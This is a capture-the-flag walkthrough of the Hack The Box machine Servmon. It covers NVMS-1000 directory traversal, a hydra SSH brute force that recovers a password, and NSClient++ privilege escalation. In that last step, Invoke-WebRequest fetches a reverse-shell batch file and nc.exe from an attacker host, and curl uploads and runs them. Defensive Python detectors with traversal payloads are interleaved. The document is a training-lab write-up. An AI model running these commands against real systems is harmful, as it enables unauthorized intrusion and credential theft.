Servmon-HTB

cY83rR0H1t
5 min read · Jun 23, 2020

SUMMARY

Servmon was an easy-rated Windows machine. The user part was straightforward: a directory traversal vulnerability in NVMS-1000. The root part was an NSClient++ privilege escalation. For user, anonymous FTP login gave us a file called Confidential.txt; using the hint in it, we performed the NVMS directory traversal, recovered a few passwords, and one of them worked for SSH login. For root, the NSClient++ API is vulnerable: we put a reverse shell in a script, registered it, and executed it.

RECON

As usual, we begin with an Nmap scan against the machine IP, saving the output in all formats (-oA) under the basename servmon.

nmap -sC -sV -oA servmon 10.10.10.184
Figure: 1
Figure: 2

Some ports are open:

  1. 21/TCP (FTP)
  2. 22/TCP (SSH)
  3. 80/TCP (HTTP)
  4. 8443/TCP (HTTPS)

We logged in to FTP with the default anonymous credentials. Browsing the user Nadine's directory, we found one interesting file, “Confidential.txt”.

Command
$ ftp 10.10.10.184
Figure: 3

Confidential.txt contains a message from the user Nathan.

Figure: 4

The file hints that Passwords.txt is on Nathan's desktop. Next we enumerated port 80.

Visiting port 80, we landed on a login page. This web server is hosting Network Surveillance Management Software: NVMS-1000 is a monitoring client specially designed for network video surveillance.

Figure: 5

We used Metasploit to perform the NVMS traversal attack, giving it the file path we were hinted at, i.e. User/Nathan/Desktop/Passwords.txt.

Figure: 6

After running the module, the attack succeeded and we got the passwords file back in our working directory.

Figure: 7
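For contrast with the attack, the following is an added Python example (not code from this write-up or from NVMS-1000) showing the check a file-serving handler should make before opening a requested path, together with a small scan over constructed access-log lines that finds requests which would have escaped the web root. The web root C:/NVMS/www, the log format and the log lines are all assumptions; the traversal paths are modelled on the file path used above plus the usual encoded variants a guard must also reject.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed web-server access log (not from the write-up). Format per line:
# "<client ip> <method> <requested path> <status>".
SAMPLE_ACCESS_LOG = """\
10.10.14.37 GET /index.html 200
10.10.14.37 GET /static/../index.html 200
10.10.14.37 GET /../../../../Users/Nathan/Desktop/Passwords.txt 200
10.10.14.37 GET /..%5c..%5c..%5cWindows/win.ini 200
10.10.14.37 GET /%252e%252e/%252e%252e/boot.ini 404
10.10.14.99 GET /login 200
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$")


def decode_request_path(path):
    """Percent-decode twice (defeats double encoding) and unify separators."""
    return unquote(unquote(path)).replace("\\", "/")


def resolve_under_webroot(webroot, requested):
    """Lexically resolve a request path against the web root.

    Returns the normalized path if it stays inside `webroot`, or None if the
    request names a drive-letter absolute path or climbs out with '..'.
    A file-serving handler should apply this before opening anything.
    """
    decoded = decode_request_path(requested).lstrip("/")
    if re.match(r"^[A-Za-z]:", decoded):
        return None  # e.g. C:/Windows/... is never served
    root = posixpath.normpath(webroot.replace("\\", "/"))
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def find_traversal_requests(log_text, webroot="C:/NVMS/www"):
    """Return (ip, raw_path, status) for each request that would escape the web root.

    A 200 status on such a line means the server actually served the file,
    which is the signal to escalate; a 404 is an attempt that failed.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and resolve_under_webroot(webroot, m["path"]) is None:
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_traversal_requests(SAMPLE_ACCESS_LOG):
        print(f"{ip} {status} {path}")
```

The resolution is purely lexical, so it works on captured logs as well as in a live handler; a handler that also follows symlinks should additionally compare the real path after resolution.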

Now we have 7 passwords, which we saved into a text file.

Figure: 8

We ran a brute-force attack against SSH on port 22 with hydra to find out which password is the correct one. Hydra gave us the password in just 4 seconds.

PASSWORD: L1k3B1gBut7s@W0rk

Command
# hydra -L users -P passwords ssh://10.10.10.184
Figure: 9
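A password-list run like the one above is noisy on the server side. As an added example (not part of this write-up), here is a Python detector run over constructed sshd log lines: a per-source sliding window that fires when a source reaches a number of failed logins inside a short interval, and then raises a separate, higher-value alert if that same source later logs in successfully. The hostname, process ids, user names and the year 2020 are assumed for the sample.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth-log excerpt (not from the write-up). Syslog lines carry
# no year, so parse_auth_log() is given one; 2020 is assumed to match the
# write-up's date. The burst from 10.10.14.37 models a short password-list run.
SAMPLE_AUTH_LOG = """\
Jun 23 10:15:01 servmon sshd[1201]: Failed password for nadine from 10.10.14.37 port 50112 ssh2
Jun 23 10:15:01 servmon sshd[1202]: Failed password for nathan from 10.10.14.37 port 50113 ssh2
Jun 23 10:15:02 servmon sshd[1203]: Failed password for nadine from 10.10.14.37 port 50114 ssh2
Jun 23 10:15:02 servmon sshd[1204]: Failed password for nathan from 10.10.14.37 port 50115 ssh2
Jun 23 10:15:03 servmon sshd[1205]: Failed password for nadine from 10.10.14.37 port 50116 ssh2
Jun 23 10:15:04 servmon sshd[1206]: Accepted password for nadine from 10.10.14.37 port 50117 ssh2
Jun 23 10:30:00 servmon sshd[1300]: Failed password for admin from 10.10.14.99 port 40000 ssh2
Jun 23 11:30:00 servmon sshd[1301]: Accepted password for nadine from 10.10.14.50 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_auth_log(text, year=2020):
    """Turn log lines into (timestamp, outcome, user, ip) tuples; skip non-matching lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["outcome"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Per-source sliding window over failed logins.

    Emits ("bruteforce", ip, user, ts) once a source reaches `threshold`
    failures inside `window_seconds`, and ("success_after_bruteforce", ...)
    for any later Accepted login from a flagged source, which is the event
    that actually needs a response.
    """
    recent = defaultdict(deque)
    flagged = set()
    alerts = []
    for ts, outcome, user, ip in sorted(events):
        if outcome == "Failed":
            window = recent[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user, ts))
        elif ip in flagged:
            alerts.append(("success_after_bruteforce", ip, user, ts))
    return alerts


def run_sample():
    return detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG))


if __name__ == "__main__":
    for kind, ip, user, ts in run_sample():
        print(f"{ts:%Y-%m-%d %H:%M:%S} {kind:25} {ip} ({user})")
```

On the sample, the single failed attempt from 10.10.14.99 stays below the threshold and the later login from 10.10.14.50 is not flagged, while 10.10.14.37 produces both alerts.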

We logged in over SSH on port 22.

Command
# ssh Nathan@10.10.10.184
Figure: 10

After a successful login, we got our first user flag.

Figure: 11

PRIVILEGE ESCALATION

Enumerating files from the shell, we found the nsclient.ini file. Since NSClient++ only accepts connections from the local host, we have to set up port forwarding to reach it.

# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
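The two keys in that file are exactly what an administrator should be reviewing. As an added example (not code from this write-up or from NSClient++), here is a small Python audit that parses an nsclient.ini with the standard configparser and reports a password stored in clear text under /settings/default and any allowed hosts entry that is not loopback. The ini text below is constructed: it mirrors the keys shown above, with a second allowed-hosts entry added so the check has something to flag; the CIDR form of that entry is an assumption about the file format.

```python
import configparser
import ipaddress

# Constructed nsclient.ini excerpt (not the file from the box) that mirrors the
# keys shown above, with a second allowed-hosts entry added so the check has
# something to flag.
SAMPLE_INI = """\
; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1, 10.0.0.0/8
"""

SECTION = "/settings/default"


def audit_nsclient_ini(text):
    """Return (severity, finding) tuples for the settings that mattered here.

    Two things are checked: whether the web/API password sits in the file in
    clear text (anyone who can read the file can log in to the dashboard), and
    whether `allowed hosts` admits anything beyond loopback.
    """
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    findings = []
    if not cfg.has_section(SECTION):
        return [("info", f"no {SECTION} section present")]

    if cfg.get(SECTION, "password", fallback="").strip():
        findings.append(("high", "password stored in clear text under "
                                 f"{SECTION}; restrict read access to the file"))

    raw_hosts = cfg.get(SECTION, "allowed hosts", fallback="")
    hosts = [h.strip() for h in raw_hosts.split(",") if h.strip()]
    if not hosts:
        findings.append(("medium", "allowed hosts is empty"))
    for host in hosts:
        try:
            net = ipaddress.ip_network(host, strict=False)
        except ValueError:
            findings.append(("medium", f"allowed hosts entry not parseable as an address: {host}"))
            continue
        if not net.is_loopback:
            findings.append(("medium", f"allowed hosts admits non-loopback source {host}"))
    return findings


if __name__ == "__main__":
    for severity, finding in audit_nsclient_ini(SAMPLE_INI):
        print(f"[{severity}] {finding}")
```

The audit only looks at content. On this box the decisive weakness was that a low-privileged user could read the file at all, so the file's ACL is the control to fix first; the clear-text password finding is there to point at that.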

From our attacking machine we opened an SSH session with local port forwarding (-L), mapping local port 8443 to 127.0.0.1:8443 on the target.

Command
# ssh -l Nadine 10.10.10.184 -L 8443:127.0.0.1:8443
Figure: 12

Now we can reach the application on our own local host. The password for the login page is the one given in nsclient.ini.

Figure: 13

Logging in with the password ew2x6SsGTxjRwXOT brings us to the NSClient++ dashboard.

Figure: 14

Add a script entry, foobar, that calls evil2.bat and save the settings.

We go to the “Settings” menu and click “Add new” to add our script, evil2.bat.

We created evil2.bat on our host machine; it contains our reverse shell command. The following commands fetch it, along with nc.exe, onto the target.

Command
# Invoke-WebRequest "http://10.10.14.37:8000/evil2.bat" -OutFile c:\Temp\evil2.bat
# Invoke-WebRequest "http://10.10.14.37:8000/nc.exe" -OutFile c:\Temp\nc.exe
Figure: 15

The figure below shows our reverse shell script.

Figure: 16

The command is run from the normal shell.

We can use the following curl call to upload it as evil2.bat through the NSClient++ API.

Command
# curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/evil2.bat --data-binary @evil2.bat


Finally, we query the command through the API.

Command
# curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries
Figure: 17


MSc CyberSecurity |Cybersecurity researcher | OSCP | CRTO | CRTP |eCPPTv2 | eJPT | Hack The Box player | CTF player |